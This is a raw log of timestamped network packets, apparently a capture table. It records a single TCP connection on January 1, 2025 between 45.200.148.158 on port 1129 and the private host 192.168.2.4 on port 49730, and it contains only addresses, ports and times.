Jan 1, 2025 18:10:01.499999046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.500000954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.500041008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.505568027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505626917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505637884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505673885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.505733967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505748987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505767107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505791903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.505826950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.505861044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505872011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.505912066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506016970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506026983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506047010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506067991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506139040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506150007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506175041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506279945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506298065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506315947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506324053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506334066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506341934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506352901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506366968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506392956 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506608009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506618977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506639957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506645918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506673098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506788969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506800890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506849051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.506934881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506961107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506975889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.506993055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507005930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507009983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507021904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507038116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507039070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507051945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507339001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507350922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507383108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507483959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507497072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507513046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507523060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507531881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507545948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507553101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507561922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507580042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.507956982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507973909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507992029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.507992983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508002043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508019924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508032084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508035898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508044958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508061886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508063078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508078098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508093119 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508095980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508111000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508124113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508126974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508146048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508152962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508156061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508186102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508759022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508769035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508788109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508805037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508815050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508820057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508841991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508846045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508852959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508861065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.508872986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.508898020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.509222984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509233952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509252071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509262085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509268999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509268999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.509290934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509295940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.509305000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.509344101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.562635899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.562650919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.562675953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.562691927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.562705994 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.562727928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.562735081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.562751055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.562825918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.562840939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572449923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572510004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.572540998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572554111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572598934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.572680950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572691917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572735071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.572794914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572807074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.572846889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.573012114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573048115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573079109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573117971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.573153019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573194981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.573225021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573235989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573281050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.573342085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573353052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.573402882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579118013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579140902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579155922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579196930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579277039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579288960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579335928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579411983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579428911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579463959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579588890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579598904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579616070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579628944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579631090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579646111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579659939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579660892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579690933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.579890013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579900980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.579950094 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.580034018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580046892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580074072 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.580092907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580105066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580118895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580137968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580146074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.580152035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580169916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.580169916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.580189943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.586486101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586525917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.586527109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586539030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586674929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586693048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586711884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.586749077 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.586780071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586833000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.586874008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.592361927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592401981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592411995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592438936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.592519999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592531919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592556953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.592678070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592689037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592705965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592726946 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.592757940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.592799902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592818022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592828989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592848063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.592859030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.592888117 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593049049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593060970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593079090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593092918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593096018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593158960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593346119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593364954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593381882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593394995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593400002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593413115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593426943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593440056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593451023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593477964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593767881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593789101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593805075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593815088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593817949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593832016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593841076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593846083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593866110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.593866110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.593931913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594110966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594235897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594244957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594263077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594269037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594276905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594291925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594300985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594307899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594321012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594336987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594337940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594346046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594364882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594366074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594391108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594670057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594681978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594710112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594892025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594902992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594922066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594934940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594938040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594952106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594955921 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.594964027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594986916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.594995975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595000982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595014095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595026016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595040083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595043898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595055103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595058918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595072985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595072985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595087051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595119953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595542908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595555067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595573902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595587969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595592022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595623970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595784903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595796108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595813990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595824957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595837116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595848083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595849991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595865965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595876932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595882893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595896959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595913887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595921040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.595927000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.595944881 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.636029959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.649383068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649410009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649425030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649452925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.649558067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649580002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649593115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649597883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.649610043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.649646044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659219980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659245014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659259081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659270048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659293890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659365892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659377098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659410954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659466028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659476995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659524918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659574032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659584045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659621954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659775019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659836054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659847021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659883976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.659936905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659959078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.659981012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.660068989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.660100937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.660111904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.660137892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.660166025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.665883064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.665935993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.665946960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.665982962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.666084051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.666095018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:01.666122913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:01.666193962 CET	1129	49730	45.200.148.158	192.168.2.4
